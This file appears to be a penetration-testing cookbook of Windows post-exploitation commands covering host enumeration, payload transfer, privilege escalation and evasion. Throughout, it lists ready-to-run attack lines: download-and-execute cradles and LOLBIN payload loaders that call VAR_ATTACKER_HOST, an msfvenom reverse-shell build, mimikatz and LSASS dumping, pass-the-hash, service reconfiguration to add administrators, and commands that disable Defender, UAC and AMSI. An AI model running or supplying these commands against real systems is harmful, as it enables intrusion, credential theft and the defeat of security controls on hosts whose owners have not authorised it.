Target.Host.OS.Windows.txt

`` Enumeration

    `` Automated

        -- Easily detected by AV without patching
        ~> seatbelt.exe all full > report.txt

    `` whoami

        ~> echo %USERNAME% || whoami.exe
        ~> wmic.exe useraccount where name='%USERNAME%' get sid

        -- Verbose (whoami may trigger EDR)
        ~> whoami.exe /all

    `` Users and Groups

        ~> net.exe users
        ~> net.exe localgroup
        ~> net.exe localgroup Administrators
        ~> net.exe localgroup "Remote Desktop Users"

        -- Verbose, with SIDs
        ~> wmic.exe useraccount list full

    `` OS

        -- Basic
        ~> ver.exe & echo %PROCESSOR_ARCHITECTURE%

        -- With systeminfo
        ~> systeminfo.exe | findstr.exe /B /C:"OS Name" /C:"OS Version" /C:"System Type"
        
        -- Windows Release ID
        ~> reg.exe query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ReleaseId

        -- WMI variant
        ~> wmic.exe os get OSArchitecture,Caption,Version

        `` File-based

            -- Windows XP
            - C:\Windows\System32\eula.txt

            -- Windows 7
            - C:\Windows\System32\license.rtf

            -- Windows 10
            - C:\Windows\System32\license.rtf (EULA code lookup)

    `` Networking

        ~> ipconfig.exe /all
        ~> arp.exe -a

        -- Routing
        ~> route.exe print
        ~> netstat.exe -r

        -- Listening TCP sockets
        ~> netstat.exe -ano -p tcp | findstr.exe LISTENING

        -- Listening UDP sockets
        ~> netstat.exe -ano -p udp | findstr.exe LISTENING

        -- Find a binary behind the specific port
        ~> for /f "tokens=3 delims=LISTENING" %i in ('netstat.exe -ano ^| findstr.exe "VAR_INTEGER"') do tasklist.exe /fi "pid eq %i"
        ~PS> netstat.exe -aon | Select-String VAR_INTEGER | ForEach-Object { $_ -replace '\s+', ',' } | ConvertFrom-Csv -Header @('Empty', 'Protocol', 'AddressLocal', 'AddressForeign', 'State', 'PID') | ForEach-Object { $portProcess = Get-Process | Where-Object Id -eq $_.PID; $_ | Add-Member -NotePropertyName 'ProcessName' -NotePropertyValue $portProcess.ProcessName; Write-Output $_ } | Sort-Object ProcessName, State, Protocol, AddressLocal, AddressForeign | Select-Object  ProcessName, State, Protocol, AddressLocal, AddressForeign | Format-Table

        -- Established connections
        ~> netstat.exe -an | findstr.exe ESTABLISHED

        `` Firewall Settings

            `` State

                ~> netsh.exe firewall show state

            `` Open ports

                @ snippets/windows/utils/Win10FirewallRules.ps1

        `` In the Windows Network context

            `` General

                -- Computer name, user name, OS version and communication settings
                ~> net.exe config workstation
                ~> net.exe config server

                -- Show information about all sessions with the local computer
                ~> net.exe session

                -- Show a list of network connections
                ~> net.exe use

                -- Show a list of computers
                ~> net.exe view

                -- Shared resources for all domains in the network
                ~> net.exe view /all /domain

                -- Show password and logon policy for the domain
                ~> net.exe accounts /domain

            `` Network Shares

                ~> net.exe share
                ~> wmic.exe share list

            `` Windows Server (RDP)

                ~> qwinsta.exe
                ~> quser.exe

        `` SNMP

            ~> reg.exe query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
            ~PS> Get-ChildItem --Path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse

        `` IPv6 support

            ~PS> Write-Host 'OS Supports IPv6: ' $( [System.Net.Sockets.Socket]::OSSupportsIPv6 )

    `` PowerShell

        ~> reg.exe query "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
        ~> reg.exe query "HKLM\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine" /v PowerShellVersion

        `` Check if running as 64-bit

            ~> [Environment]::Is64BitProcess

        `` Check if running in CLM
        
            ~> $ExecutionContext.SessionState.LanguageMode

    `` Startup Items

        ~> wmic.exe startup list brief

    `` Services

        ~> net.exe start

        ~> sc.exe query state= all | findstr.exe "SERVICE_NAME DISPLAY_NAME STATE"

        `` Powershell

            ~PS> Get-Service VAR_NAME | format-list
            ~PS> Get-Itemproperty HKLM:\System\CurrentControlSet\services\VAR_NAME

        `` Unquoted Service Paths

            ~> wmic.exe service get Name,DisplayName,PathName,StartMode | findstr.exe /i /v "C:\Windows" | findstr.exe /i /v """

    `` Installed software

        ~> dir /a "C:\Program Files" "C:\Program Files (x86)"
        ~> reg.exe query HKEY_LOCAL_MACHINE\SOFTWARE

        -- Verbose but takes time
        ~> wmic.exe product get Name,Version

        -- Drivers
        ~> driverquery.exe

        -- AV
        ~> wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /format:list

        -- Installed Patches
        ~> wmic.exe qfe get Caption,Description,HotFixID,InstalledOn

        -- Security mechanisms enabled?
        ~> reg.exe query HKLM\System\CurrentControlSet\Control\DeviceGuard

            - EnableVirtualizationSecurity - Credential Guard
            - RequirePlatformServices - 1 for SecureBoot
            - RequirePlatformServices - 3 for Secure Boot and DMA Protection

    `` Processes

        ~> tasklist.exe /svc
        ~> tasklist.exe /v /fi "username eq system"

        -- Verbose
        ~> wmic.exe process list

    `` Scheduled Tasks

        ~> schtasks.exe /query /fo LIST /v
        ~> schtasks.exe /query /fo LIST 2>nul | findstr.exe "VAR_STRING"

    `` Logging

        ~> reg.exe query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
        ~> reg.exe query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager
        ~> reg.exe query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
        ~> reg.exe query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
        ~> wevutil el

    `` AppLocker

        ~PS> (Get-AppLockerPolicy -Local).RuleCollections
        ~PS> Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse
        ~> reg.exe query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\

     `` Interesting files

        - %SYSTEMROOT%\System32\$winnt$.inf
        - %SYSTEMROOT%\Panther\Unattend.xml
        - %SYSTEMROOT%\Panther\Unattend\Unattend.xml
        - %SYSTEMROOT%\system32\sysprep.inf
        - %SYSTEMROOT%\system32\sysprep\sysprep.xml
        - %SYSTEMROOT%\ntds
        - %SYSTEMROOT%\System32\GroupPolicy\Machine
        - %SYSTEMROOT%\System32\GroupPolicy\User
        - %SYSTEMROOT%\System32\GroupPolicyUsers
        - %SYSTEMDRIVE%\pagefile.sys
        - %SYSTEMROOT%\debug\NetSetup.log
        - %SYSTEMROOT%\iis6.log
        - %SYSTEMROOT%\iis7.log
        - %SYSTEMROOT%\iis8.log
        - %SYSTEMROOT%\Panther\Unattend.txt
        - %SYSTEMROOT%\php.ini
        - %SYSTEMROOT%\repair\SAM
        - %SYSTEMROOT%\repair\security
        - %SYSTEMROOT%\repair\software
        - %SYSTEMROOT%\repair\system
        - %SYSTEMROOT%\system32\CCM\logs\*.log
        - %SYSTEMROOT%\system32\config\AppEvent.Evt
        - %SYSTEMROOT%\system32\config\default.sav
        - %SYSTEMROOT%\system32\config\regback\default
        - %SYSTEMROOT%\System32\config\RegBack\SAM
        - %SYSTEMROOT%\System32\config\RegBack\system
        - %SYSTEMROOT%\system32\config\regback\security
        - %SYSTEMROOT%\system32\config\regback\software
        - %SYSTEMROOT%\System32\config\SAM
        - %SYSTEMROOT%\system32\config\SecEvent.Evt
        - %SYSTEMROOT%\system32\config\security.sav
        - %SYSTEMROOT%\system32\config\software.sav
        - %SYSTEMROOT%\System32\config\SYSTEM
        - %SYSTEMROOT%\system32\config\system.sav
        - %SYSTEMROOT%\System32\drivers\etc\hosts
        - %SYSTEMROOT%\System32\drivers\etc\networks
        - %SYSTEMROOT%\system32\inetsrv\config\applicationHost.config
        - %SYSTEMROOT%\system32\inetsrv\config\schema\ASPNET_schema.xml
        - %SYSTEMROOT%\system32\logfiles\httperr\httperr1.log
        - %SYSTEMROOT%\system32\sysprep
        - %SYSTEMROOT%\win.ini
        - %SYSTEMROOT%\windowsupdate.log
        - %USERPROFILE%\ntuser.dat
        - %USERPROFILE%\Application Data\Microsoft\Credentials\
        - %SYSTEMDRIVE%\apache\logs\access.log
        - %SYSTEMDRIVE%\apache\logs\error.log
        - %SYSTEMDRIVE%\apache\php\php.ini
        - %SYSTEMDRIVE%\Autounattend.xml
        - %SYSTEMDRIVE%\boot.ini
        - %SYSTEMDRIVE%\Documents and Settings\Administrator\desktop\desktop.ini
        - %SYSTEMDRIVE%\Documents and Settings\Administrator\NTUser.dat
        - %SYSTEMDRIVE%\Documents and Settings\Administrator\ntuser.ini
        - %SYSTEMDRIVE%\inetpub\logs\LogFiles\
        - %SYSTEMDRIVE%\inetpub\wwwroot\
        - %SYSTEMDRIVE%\inetpub\wwwroot\global.asa
        - %SYSTEMDRIVE%\inetpub\wwwroot\web.config
        - %SYSTEMDRIVE%\MySQL\data\hostname.err
        - %SYSTEMDRIVE%\MySQL\data\mysql.err
        - %SYSTEMDRIVE%\MySQL\data\mysql.log
        - %SYSTEMDRIVE%\MySQL\my.cnf
        - %SYSTEMDRIVE%\MySQL\my.ini
        - %SYSTEMDRIVE%\php4\php.ini
        - %SYSTEMDRIVE%\php5\php.ini
        - %SYSTEMDRIVE%\php\php.ini
        - %SYSTEMDRIVE%\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
        - %SYSTEMDRIVE%\Program Files (x86)\Apache Group\Apache\conf\access.log
        - %SYSTEMDRIVE%\Program Files (x86)\Apache Group\Apache\conf\error.log
        - %SYSTEMDRIVE%\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
        - %SYSTEMDRIVE%\Program Files (x86)\FileZilla Server\FileZilla Server.xml
        - %SYSTEMDRIVE%\Program Files (x86)\xampp\apache\conf\httpd.conf
        - %SYSTEMDRIVE%\Program Files\Apache Group\Apache2\conf\httpd.conf
        - %SYSTEMDRIVE%\Program Files\Apache Group\Apache\conf\httpd.conf
        - %SYSTEMDRIVE%\Program Files\Apache Group\Apache\logs\access.log
        - %SYSTEMDRIVE%\Program Files\Apache Group\Apache\logs\error.log
        - %SYSTEMDRIVE%\Program Files\FileZilla Server\FileZilla Server.xml
        - %SYSTEMDRIVE%\Program Files\MySQL\data\hostname.err
        - %SYSTEMDRIVE%\Program Files\MySQL\data\mysql-bin.log
        - %SYSTEMDRIVE%\Program Files\MySQL\data\mysql.err
        - %SYSTEMDRIVE%\Program Files\MySQL\data\mysql.log
        - %SYSTEMDRIVE%\Program Files\MySQL\my.cnf
        - %SYSTEMDRIVE%\Program Files\MySQL\my.ini
        - %SYSTEMDRIVE%\Program Files\MySQL\MySQL Server 5.0\data\hostname.err
        - %SYSTEMDRIVE%\Program Files\MySQL\MySQL Server 5.0\data\mysql-bin.log
        - %SYSTEMDRIVE%\Program Files\MySQL\MySQL Server 5.0\data\mysql.err
        - %SYSTEMDRIVE%\Program Files\MySQL\MySQL Server 5.0\data\mysql.log
        - %SYSTEMDRIVE%\Program Files\MySQL\MySQL Server 5.0\my.cnf
        - %SYSTEMDRIVE%\Program Files\MySQL\MySQL Server 5.0\my.ini
        - %SYSTEMDRIVE%\Program Files\MySQL\MySQL Server 5.1\my.ini
        - %SYSTEMDRIVE%\sysprep.inf
        - %SYSTEMDRIVE%\sysprep\sysprep.inf
        - %SYSTEMDRIVE%\sysprep\sysprep.xml
        - %SYSTEMDRIVE%\Unattend.xml
        - %SYSTEMDRIVE%\Users\Administrator\Desktop\desktop.ini
        - %SYSTEMDRIVE%\Users\Administrator\NTUser.dat
        - %SYSTEMDRIVE%\Users\Administrator\NTUser.ini
        - %SYSTEMDRIVE%\xampp\apache\bin\php.ini
        - %SYSTEMDRIVE%\xampp\apache\conf\httpd.conf
        - %SYSTEMDRIVE%\xampp\apache\logs\access.log
        - %SYSTEMDRIVE%\xampp\apache\logs\error.log
        - %SYSTEMDRIVE%\xampp\security\webdav.htpasswd
        - %SYSTEMDRIVE%\xampp\tomcat\conf\tomcat-users.xml
        - %SYSTEMDRIVE%\xampp\tomcat\conf\web.xml
        - %SYSTEMDRIVE%\xampp\webalizer\webalizer.conf
        - %SYSTEMDRIVE%\xampp\webdav\webdav.txt
        - %APPDATA%\Microsoft\Credentials
        - %APPDATA%\Microsoft\Protect
        - *.gpg
        - *.pgp
        - *.p12
        - *.der
        - *.csr
        - *.cer
        - *.ovpn
        - *.kdbx

    `` Registry keys

        - HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
        - HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
        - HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit
        - HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
        - HKLM\Software\Microsoft\Windows\CurrentVersion\Run
        - HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
        - HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
        - HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
        - HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
        - HKLM\System\CurrentControlSet\Control\Session Manager\BootExecute
        - HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
        - HKCU\Software\Microsoft\Windows\CurrentVersion\Run
        - HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
        - HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
        - HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce (legacy Windows)

        ~> reg.exe query HKLM /f password /t REG_SZ /s

    `` Weak Permissions

        `` Filesystem

            ~> icacls "C:\Documents and Settings\*" 2>nul | findstr.exe "(F) (M)" | findstr.exe "Everyone BUILTIN\Users"
            ~> icacls "C:\Program Files (x86)\*" 2>nul | findstr.exe "(F) (M)" | findstr.exe "Everyone BUILTIN\Users"
            ~> icacls "C:\Program Files\*" 2>nul | findstr.exe "(F) (M)" | findstr.exe "Everyone BUILTIN\Users"
            ~> icacls "C:\Users\*" 2>nul | findstr.exe "(F) (M)" | findstr.exe "Everyone BUILTIN\Users"
            ~> icacls "C:\*." /findsid VAR_USERNAME /t /c /l 2>nul

            -- Files

            ~> accesschk.exe -uwvs "Authenticated Users" c:\
            ~> accesschk.exe -uwvs "Everyone" c:\
            ~> accesschk.exe -uwvs "Users" c:\

            -- Directories

            ~> accesschk.exe -duwvs "Authenticated Users" c:\
            ~> accesschk.exe -duwvs "Everyone" c:\
            ~> accesschk.exe -duwvs "Users" c:\

        `` Registry

            ~> accesschk.exe -kuwvs "Authenticated Users" "HKLM\SYSTEM\CurrentControlSet\Services"
            ~> accesschk.exe -kuwvs "Everyone" "HKLM\SYSTEM\CurrentControlSet\Services"
            ~> accesschk.exe -kuwvs "Users" "HKLM\SYSTEM\CurrentControlSet\Services"

        `` With PowerShell

            ~PS> Get-ChildItem -Recurse | Get-Acl | out-string -stream | select-string -pattern "Everyone"

    `` Sensitive data

        ~> dir /S /B *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
        ~> dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* 2>nul
        ~> dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* 2>nul
        ~> cd C:\ && findstr.exe /SI /M password *.xml *.ini *.txt *.config *.cfg 2>nul
        ~PS> Get-Childitem -Path C:\Users\ -Include *pass*,*cred*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue
        ~PS> Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password"

`` File transfer

    `` BitsAdmin

        ~> cmd.exe /c "bitsadmin /transfer myjob /download /priority high http://VAR_ATTACKER_HOST/accesschk.exe accesschk.exe

        ~PS> Import-Module BitsTransfer
        ~PS> Start-BitsTransfer -Source $url -Destination $output

    `` certutil

        ~> certutil.exe -urlcache -split -f "http://VAR_ATTACKER_HOST/file.b64" & certutil.exe -f -decode Blob0_0.bin accesschk.exe & del Blob0_0.bin
        ~> certutil.exe -urlcache -split -f "http://VAR_ATTACKER_HOST/file.b64" & certutil.exe -f -decode accesschk.b64 accesschk.exe & del accesschk.b64

    `` Non-interactive FTP

        `` Script

            @ snippets/windows/utils/ftp.bat

    `` Powershell

        `` Script

            @ snippets/windows/utils/wget_ps1.bat

        `` CLI

            ~> powershell.exe Invoke-WebRequest -Uri http://VAR_ATTACKER_HOST/nc.exe -OutFile C:\nc.exe
            ~> powershell.exe -c "(new-object System.Net.WebClient).DownloadFile('http://VAR_ATTACKER_HOST/file.exe','C:\Users\user\Desktop\file.exe')"
            ~PS> $h=New-Object -com Msxml2.XMLHTTP;$h.open('GET','http://VAR_ATTACKER_HOST/script.ps1',$false);$h.send();iex $h.responseText
            ~PS> $h=New-Object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://VAR_ATTACKER_HOST/script.ps1',$false);$h.send();iex $h.responseText
            ~PS> $h=New-Object Net.HttpListener;$h.Prefixes.Add("http://+:8000/");$h.Start();While ($h.IsListening){$HC=$h.GetContext();$HRes=$HC.Response;$HRes.Headers.Add("Content-Type","text/plain");$Buf=[Text.Encoding]::UTF8.GetBytes((GC (Join-Path $Pwd ($HC.Request).RawUrl)));$HRes.ContentLength64=$Buf.Length;$HRes.OutputStream.Write($Buf,0,$Buf.Length);$HRes.Close()};$h.Stop()
            ~PS> $ie=New-Object -com InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://VAR_ATTACKER_HOST/script.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
            ~PS> IEX (iwr 'http://VAR_ATTACKER_HOST/script.ps1')
            ~PS> IEX (New-Object Net.Webclient).downloadstring("http://VAR_ATTACKER_HOST/script.ps1")
            ~PS> Import-Module bitstransfer;Start-BitsTransfer 'http://VAR_ATTACKER_HOST/script.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r

        `` DNS

            ~PS> IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))

        `` Base64

            ~$ cat cmd.txt | iconv -t UTF-16LE -f UTF-8 | base64 -w0
            ~> powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc "JABjAGwAaQBlAG4AdAAgA...UAKAApAAoA"

    `` VBS

        `` Script

            @ snippets/windows/utils/wget_vbs.bat

    `` Powershell listener

        @ snippets/windows/shells/bind/PortListener.ps1

    `` Base64 encoder VBS

        @ snippets/windows/utils/base64.vbs

`` Privilege escalation

    `` Ideas

        - Access to sensitive files such as the Windows SAM file
        - Always Install Elevated
        - Autologon User Credential
        - DLL Hijacking / Proxying
        - DLL Injection
        - Group Policy Preferences
        - Insecure File/Folder Permissions
        - Insecure Named Pipes Permissions
        - Insecure Registry Permissions
        - Insecure Service Permissions
        - Installation scripts and data containing passwords
        - Registry settings such as always elevated and automatically executed binaries
        - Scheduled tasks that execute scripts and programs
        - Stored Credentials
        - Token Manipulation
        - Unattended Answer File
        - Unquoted Service Path
        - User Account Control (UAC) Bypass
        - Vulnerable software running with high privileges
        - Windows Kernel Exploit

    `` Automated

        `` Powershell

            - PowerUp.ps1 (https://github.com/PowerShellEmpire/PowerTools)
            - jaws-enum.ps1 (https://github.com/411Hall/JAWS)
            - HostRecon.ps1 (https://github.com/dafthack/HostRecon)

        `` Copy & Paste

            ~PS> (New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/PowerUp.ps1') | IEX; Invoke-AllChecks
            ~PS> (New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/jaws-enum.ps1') | IEX
            ~PS> (New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/HostRecon.ps1'); Invoke-HostRecon

        `` Metasploit

            ~MS> use post/multi/recon/local_exploit_suggester

    `` Services

        `` Weak Permissions

            ~> accesschk.exe -uwvc "Authenticated Users" *
            ~> accesschk.exe -uwvc "Everyone" *

        `` Bruteforcing

            ~PS> $services = ls HKLM:\SYSTEM\CurrentControlset\Services
            ~PS> foreach ($service in $services) {
            ~PS>     reg.exe add $service.Name /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\Temp\test.bat" /f
            ~PS>     Start-Service -name $service.Name.Split("\\")[-1] 
            ~PS> }

        `` Configuration

            ~> sc.exe qc upnphost
            ~> sc.exe config upnphost binpath= "net user VAR_USERNAME VAR_PASSWORD /add && net localgroup Administrators VAR_USERNAME /add" type= interact
            ~> sc.exe config upnphost obj= ".\LocalSystem" password= ""
            ~> net.exe stop upnphost
            ~> net.exe start upnphost

        ~PS> Get-Service -name "VAR_STRING*" | Set-Service -StartupType "disabled"
        ~PS> Stop-Process -force -name VAR_STRING*

    `` Finding C# compiler

        ~> dir /s %WINDIR%\csc.exe

    `` mimikatz

        ~> mimikatz "privilege::debug" "sekurlsa::logonPasswords" exit
        ~> mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonPasswords" exit
        ~> mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonPasswords" "lsadump::lsa" "lsadump::trust" exit
        ~> mimikatz "privilege::debug" "token::elevate /domainadmin" exit
        token::run cmd.exe
        sekurlsa::pth /user:VAR_USERNAME /domain:VAR_DOMAIN /ntlm:VAR_NT_HASH /run:cmd
        ~PS> Invoke-Mimikatz -Command '"privilege::debug sekurlsa::logonPasswords"'
        ~PS> Invoke-Mimikatz -Command '"privilege::debug dbapi::cred /in:VAR_STRING"'

        `` With SharpSploit

            ~> SharpSploitConsole.exe Mimi-Command "!+"
            ~> SharpSploitConsole.exe Mimi-Command "!processprotect /process:lsass.exe /remove"
            ~> SharpSploitConsole.exe Mimi-All

        `` Dump with SysInternals procdump.exe and load offline to mimikatz

            ~> procdump.exe -ma lsass.exe lsass.dmp -accepteula
            ~> mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

        `` Dump with native DLL

            ~> tasklist.exe /fi "imagename eq lsass.exe"
            ~> C:\Windows\system32\rundll32.exe C:\Windows\system32\comsvcs.dll, MiniDump VAR_STRING_PID %TEMP%\lsass.dmp full

    `` Run shell as NT AUTHORITY\SYSTEM

        ~> psexec.exe -h -i -s %SYSTEMROOT%\system32\cmd.exe -accepteula

`` Evasion

    `` AppLocker-free paths

        - applocker-bypas-checker.ps1 (https://github.com/HackLikeAPornstar/GibsonBird/blob/master/chapter4/applocker-bypas-checker.ps1)

    `` LOLBINs

        ~> cmd.exe /k < \\VAR_ATTACKER_HOST\folder\batchfile.txt
        ~> cscript //E:jscript \\VAR_ATTACKER_HOST\folder\payload.txt
        ~> mshta vbscript:Close(Execute("GetObject(""script:http://VAR_ATTACKER_HOST/payload.sct"")"))
        ~> mshta http://VAR_ATTACKER_HOST/payload.hta
        ~> mshta \\VAR_ATTACKER_HOST\folder\payload.hta
        ~> rundll32.exe \\VAR_ATTACKER_HOST\folder\payload.dll,entrypoint
        ~> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://VAR_ATTACKER_HOST/payload.sct");window.close();
        ~> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.Exec(\"calc\")");
        ~> wmic.exe os get /format:"https://VAR_ATTACKER_HOST/payload.xsl"
        ~> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\VAR_ATTACKER_HOST\folder\payload.dll
        ~> regsvr32 /u /n /s /i:http://VAR_ATTACKER_HOST/payload.sct scrobj.dll
        ~> regsvr32 /u /n /s /i:\\VAR_ATTACKER_HOST\folder\payload.sct scrobj.dll
        ~> odbcconf /s /a {regsvr \\VAR_ATTACKER_HOST\folder\payload_dll.txt}
        ~> cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\VAR_ATTACKER_HOST\folder\payload.xml > payload.xml & !MB! payload.xml"
        ~> certutil -urlcache -split -f http://VAR_ATTACKER_HOST/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
        ~> rundll32 c:\windows\system32\ieframe.dll,OpenURL 1.url

    `` AlwaysInstallElevated

        ~> reg.exe query "HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated"
        ~> reg.exe query "HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated"

    `` Disabling defense

        `` Is Credential Guard enabled?

            ~PS> Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard

        `` Disabling Windows Defender

            ~> reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
            
            -- Disable real-time monitoring, cloud-delivered protection and automatic sample submission
            ~PS> Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disabled

            ~> sc.exe stop WinDefend

            ~PS> "C:\Program Files\Windows Defender\mpcmdrun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true
            ~PS> Add-MpPreference -ExclusionPath C:\

        `` Invoke-Mimikatz "obfuscation"

            ~$ ~/lib/pentesting-cookbook/snippets/windows/utils/obfuscate-mimikatz.sh ./Invoke-Mimikatz.ps1 Invoke-Minidoggiez.ps1

        `` Invoke-Obfuscation

            ~PS> Invoke-Obfuscation -ScriptPath 'https://example.com/VAR_STRING.ps1' -Command 'TOKEN,ALL,1,OUT Invoke-Minidoggiez.ps1' -Quiet

        `` In-memory Mimikatz

            ~PS> $browser = New-Object System.Net.WebClient
            ~PS> $browser.Proxy.Credentials =[System.Net.CredentialCache]::DefaultNetworkCredentials
            ~PS> mimi= $browser.DownloadString("http://VAR_ATTACKER_HOST/Invoke-Minidoggiez.ps1")
            ~PS> Invoke-Expression(mimi)
            ~PS> Invoke-Minidoggiez

        `` Hyperion

            ~$ msfvenom -p windows/shell_reverse_tcp lhost=VAR_ATTACKER_HOST lport=VAR_ATTACKER_PORT -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o foobar.exe
            ~$ cp /usr/share/windows-binaries/Hyperion-1.0.zip .
            ~$ unzip Hyperion-1.0.zip
            ~$ cd Hyperion-1.0/
            ~$ Hyperion-1.0# i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
            ~$ Hyperion-1.0# cp -p /usr/lib/gcc/i686-w64-mingw32/6.1-win32/libgcc_s_sjlj-1.dll .
            ~$ Hyperion-1.0# cp -p /usr/lib/gcc/i686-w64-mingw32/6.1-win32/libstdc++-6.dll .
            ~$ Hyperion-1.0# wine hyperion.exe ../foobar.exe ../crypted.exe

        `` Disable AMSI

            ~PS> [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null,$true)
            ~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:8001/amsi-bypass.ps1')

        `` Is UAC enabled?

            ~> reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA

        `` Disable UAC (Vista, 7, 8, 10)

            ~> reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f

        `` UAC bypass by mounting system

            ~> net.exe use Z: \\127.0.0.1\c$
            ~> cd C$

    `` Reading files

        ~PS> .\Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\system" -LocalDestination c:\%TEMP\system.bak
        ~PS> .\Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination c:\%TEMP\sam.bak

    `` JScript Assembly

        [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');$js = 'var js = new ActiveXObject("WScript.Shell");js.Run("calc");'[Microsoft.JScript.Eval]::JScriptEvaluate($js,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine());

    `` XML/XSL

        ~PS> $s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('http://VAR_ATTACKER_HOST/xsl-notepad.xsl',$s,$r);$x.Transform('http://VAR_ATTACKER_HOST/xsl-notepad.xml','z');del z;

    `` SCT

        `` Powershell VBScript Assembly SCT "Fetch & Execute"

            ~PS> [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:http://VAR_ATTACKER_HOST/notepad.sct').Exec(0)

        `` Powershell JScript Assembly SCT "Fetch & Execute"

            ~PS> [Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:http://VAR_ATTACKER_HOST/notepad.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())

    `` Loading .Net/C# Assemblies to Bypass AppLocker Default Rules w/ PowerShell Diagnostic Scripts

        ~> powershell.exe -v 2 -ep bypass
        ~PS> cd C:\windows\diagnostics\system\AERO
        ~PS> import-module .\CL_LoadAssembly.ps1
        ~PS> LoadAssemblyFromPath ..\..\..\..\path\assembly.exe
        ~PS> [name.space]::executesomething()

    `` Command Invocation w/ PowerShell Diagnostic Scripts

        ~> powershell.exe -v 2 -ep bypass
        ~PS> cd C:\windows\diagnostics\system\AERO
        ~PS> import-module CL_Invocation.ps1
        ~PS> SyncInvoke notepad.exe

    `` PowerShell CL Download Cradle

        ~PS> $a = New-Object System.Xml.XmlDocument
        ~PS> $a.Load("http://VAR_ATTACKER_HOST/notepad.xml")
